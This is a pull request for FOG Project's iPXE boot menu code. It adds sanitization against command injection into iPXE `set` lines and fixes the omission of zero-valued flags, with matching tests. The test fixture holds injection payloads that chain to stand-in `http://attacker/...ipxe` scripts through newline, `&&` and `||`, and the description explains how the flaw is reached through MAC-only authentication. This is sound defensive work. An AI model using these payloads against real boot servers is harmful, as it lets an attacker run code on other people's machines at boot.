### PR TITLE
Sanitize and complete the iPXE host/inventory menu variables

### DIFF
--- a/packages/web/src/Base/System.php
+++ b/packages/web/src/Base/System.php
@@ -62,7 +62,7 @@ class System
     public function __construct()
     {
         self::_versionCompare();
-        define('FOG_VERSION', '1.6.0-beta.4324');
+        define('FOG_VERSION', '1.6.0-beta.4327');
         define('FOG_CHANNEL', 'Beta');
         // Bumped by one for every element added to $this->schema in
         // commons/schema.php, and it must never fall BELOW that element

--- a/packages/web/src/Boot/IpxeBootMenu.php
+++ b/packages/web/src/Boot/IpxeBootMenu.php
@@ -423,7 +423,21 @@ class IpxeBootMenu extends BootMenuBase
         }
         $output = [];
         foreach ($object as $property => $value) {
-            if (in_array($property, $ignore_keys) or is_object($value) or !$value) {
+            /**
+             * Absent, not merely falsy. '0' is falsy in PHP and meaningful
+             * in iPXE, and skipping it meant a host with enforce=0 emitted
+             * no `set enforce` at all -- indistinguishable from a host where
+             * the field does not apply. Conditional menus in iPXE are built
+             * on isset/iseq, so a flag that cannot be read as false is a
+             * flag that cannot be branched on, which is half of what GH-572
+             * asked for.
+             */
+            if (in_array($property, $ignore_keys)
+                || is_object($value)
+                || null === $value
+                || '' === $value
+                || [] === $value
+            ) {
                 continue;
             }
             if (is_array($value)) {
@@ -436,18 +450,75 @@ class IpxeBootMenu extends BootMenuBase
                     if (!is_scalar($item)) {
                         continue;
                     }
-                    $output[] = "set {$property}{$count} {$item}";
+                    $safe = self::_setSafe($item);
+                    if ('' === $safe) {
+                        continue;
+                    }
+                    $output[] = "set {$property}{$count} {$safe}";
                     $count++;
                 }
             } else {
                 if ($property == 'name') {
                     $property = 'host' . $property;
                 }
-                $output[] = "set {$property} {$value}";
+                $safe = self::_setSafe($value);
+                if ('' === $safe) {
+                    continue;
+                }
+                $output[] = "set {$property} {$safe}";
             }
         }
 
         return $output;
+    }
+    /**
+     * Makes a value safe to interpolate into an iPXE `set` line.
+     *
+     * The same threat as _echoSafe() below, over a different character set.
+     * An iPXE script is newline-delimited commands with `&&` and `||` as
+     * in-line separators, and Initiator::sanitizeOutput() collapses a RUN of
+     * whitespace to its first character rather than removing newlines -- so a
+     * newline, or a bare `&&`, inside a value ends the `set` and begins a new
+     * command that iPXE then runs.
+     *
+     * Which is reachable: boot.php is unauthenticated by necessity, and
+     * service/inventory.php authenticates by MAC alone, so the values these
+     * lines carry are not all under an admin's control. Unsanitized, a
+     * stored separator ended the `set` and left whatever followed it running
+     * as its own command -- emitted above the menu, so before the operator
+     * sees anything.
+     *
+     * `$`, `{` and `}` go for a lesser reason: iPXE expands ${...} at use, so
+     * a stored value could otherwise read back another variable in the menu.
+     *
+     * A whitelist is not usable here the way it is for _echoSafe(). Those
+     * values are architecture names and filenames; these are SMBIOS strings,
+     * image names, memory sizes and dates, which legitimately carry spaces,
+     * slashes, commas and colons. So what is removed is exactly iPXE's own
+     * syntax, and the value is length-capped so one long field cannot push
+     * the rest of the menu off screen.
+     *
+     * @param mixed $value the value to render
+     *
+     * @return string
+     */
+    private static function _setSafe($value)
+    {
+        /**
+         * Before the cast, not after: (string)false is '' and would be
+         * dropped by the caller's empty check, silently reintroducing the
+         * very omission the falsy guard above was widened to fix.
+         */
+        if (is_bool($value)) {
+            $value = (int)$value;
+        }
+        $value = preg_replace(
+            '/[\x00-\x1F\x7F&|${}]/',
+            '',
+            (string)$value
+        );
+
+        return trim(substr((string)$value, 0, 255));
     }
     /**
      * Initializes the boot menu class

--- a/tests/bootmenu-ipxe-output.test.php
+++ b/tests/bootmenu-ipxe-output.test.php
@@ -603,6 +603,81 @@ $checks = [
             'ADPASSLEGACYSHOULDNOTAPPEAR',
         ],
     ],
+    /*
+     * generateIpxeItems() emits host and inventory columns as `set` lines,
+     * and service/inventory.php authenticates by MAC alone -- so anyone who
+     * knows a MAC can write those columns. iPXE separates commands on a
+     * newline and on `&&`/`||`, so an unsanitized value is an
+     * unauthenticated command injection into the boot script of someone
+     * else's machine, emitted above the menu where it runs before the user
+     * sees anything.
+     *
+     * Each refute is the SEPARATOR plus the command, not the command alone:
+     * once the separator is stripped the payload text survives harmlessly
+     * inside the value, so a marker-only refute would report a pass on
+     * output that still contained it. The matching expectLine pins that the
+     * field is still emitted, so dropping the value outright does not pass
+     * either.
+     */
+    'no host field can inject an iPXE command' => [
+        'scenario' => [
+            'host' => ['id' => 1, 'name' => 'testhost'],
+            'request' => ['arch' => 'x86_64', 'platform' => 'bios'],
+            'hostRow' => [
+                'imagename' => "keepme\nchain http://attacker/newline.ipxe",
+                'description2' => 'keepme && chain http://attacker/andand.ipxe',
+                'description3' => 'keepme || chain http://attacker/oror.ipxe',
+                'description4' => 'keepme ${boot-url}',
+            ],
+        ],
+        'expectLine' => [
+            'set imagename keepme',
+            'set description2 keepme',
+            'set description3 keepme',
+            'set description4 keepme',
+        ],
+        'refuteLine' => [
+            "\nchain http://attacker/newline.ipxe",
+            '&& chain http://attacker/andand.ipxe',
+            '|| chain http://attacker/oror.ipxe',
+            'set description4 keepme ${boot-url}',
+        ],
+    ],
+    /*
+     * A flag set to off has to reach iPXE as `set <field> 0`, not as
+     * nothing. iPXE conditionals are isset/iseq, so an omitted field and a
+     * field that is false read identically -- which is what stopped GH-572's
+     * "show this menu item only when the flag is set" case from working at
+     * all. Covered here rather than in the golden because the golden's host
+     * row carries no zero-valued column.
+     *
+     * The empty/null pair is asserted alongside deliberately: widening the
+     * falsy guard is only correct if it stops at absent, and a guard that
+     * emitted `set nothingset ` for an empty column would still satisfy the
+     * zero half on its own.
+     */
+    'a false flag is emitted as 0, an absent one not at all' => [
+        'scenario' => [
+            'host' => ['id' => 1, 'name' => 'testhost'],
+            'request' => ['arch' => 'x86_64', 'platform' => 'bios'],
+            'hostRow' => [
+                'enforce' => 0,
+                'pending' => '0',
+                'useAD' => false,
+                'nothingset' => '',
+                'nevermind' => null,
+            ],
+        ],
+        'expectLine' => [
+            "\nset enforce 0\n",
+            "\nset pending 0\n",
+            "\nset useAD 0\n",
+        ],
+        'refuteLine' => [
+            'set nothingset',
+            'set nevermind',
+        ],
+    ],
 ];
 
 $checkFailures = [];


### PR DESCRIPTION
Closes #572.

#572 asked for host variables in the iPXE menu so a menu item's Parameters
could say `config-${hostname}-join.yaml`. `generateIpxeItems()` delivered
that and it works — verified against a live 1.6 server, where a registered
host's boot script carries `hostname`, `primac`, `macs0..N`, `imagename`,
`archname`, the ping/checkin fields and the whole inventory row before
`:MENU`, so the Parameters field resolves them. Two things it did not get
right.

## Values were interpolated raw

An iPXE script is newline-delimited commands with `&&` and `||` as in-line
separators, and `Initiator::sanitizeOutput()` collapses a *run* of
whitespace to its first character rather than removing newlines. So a
separator inside a value ends the `set` and begins a new command that iPXE
then runs. `boot.php` is unauthenticated by necessity and
`service/inventory.php` authenticates by MAC alone, so not every value on
these lines is under an admin's control — and they are emitted above the
menu, i.e. before the operator sees a screen.

`_echoSafe()` has covered the arch/kernel notices against exactly this
since they were added; `generateIpxeItems()` was never brought under it.

New `_setSafe()` strips iPXE's own syntax — control characters and
`& | $ { }` — and caps at 255. A whitelist is not usable here the way it is
for `_echoSafe()`: those values are architecture names and filenames, these
are SMBIOS strings, image names, memory sizes and dates that legitimately
carry spaces, slashes, commas and colons. Every `inventory` column is
already `varchar(255)` or narrower and no emitted `hosts` column runs long,
so the cap truncates nothing real.

## A flag set to off was omitted entirely

The skip was `!$value`, which is true of `'0'`. A host with `enforce=0`
emitted no `set enforce` line at all — indistinguishable from a host where
the field does not apply. iPXE conditionals are `isset`/`iseq`, so a flag
that cannot be read as false is a flag that cannot be branched on, and
conditional menu display was half of what #572 asked for.

The guard now stops at genuinely absent (`null`, `''`, `[]`), and booleans
are cast to int before `_setSafe()` so `(string)false` does not silently
reintroduce the omission.

## Verification

Two behaviour checks added to `tests/bootmenu-ipxe-output.test.php`, both
shown red before they were green — against the pre-change class and against
three targeted single-guard reverts, so each assertion has been observed
failing:

- injection payloads carrying each separator. The refutes name the
  separator *plus* the command rather than the command alone: once the
  separator is stripped the payload text survives harmlessly inside the
  value, so a marker-only refute would report a pass on output that still
  contained it. The paired `expectLine`s pin that the field is still
  emitted, so dropping values outright does not pass either;
- a host row mixing `0`, `'0'`, `false`, `''` and `null`.

Golden output is byte-identical (110998 bytes) — the fixture host row
carries no zero-valued or hostile column, which is why both checks live in
the behaviour section rather than the golden. Full `tests/*.test.php` suite
green, php-cs-fixer `@PSR2` clean, PHPStan clean.

`generateIpxeItems()` does not exist on `dev-branch`, so there is nothing
to port.

## Not in this PR

- `set hostname` is emitted twice — once from the host row's `name`, once
  from the inventory list's joined `hostname` column. Same value, harmless.
- The whole header, `#!ipxe` included, is emitted inside
  `if ($StorageNode->isValid())`, so an install with no storage node at all
  gets a truncated script.
- `description` is on the ignore list while post-download scripts do get
  `hostdesc`.
- docs.fogproject.org has no page listing these variables; #572 asked for
  one twice.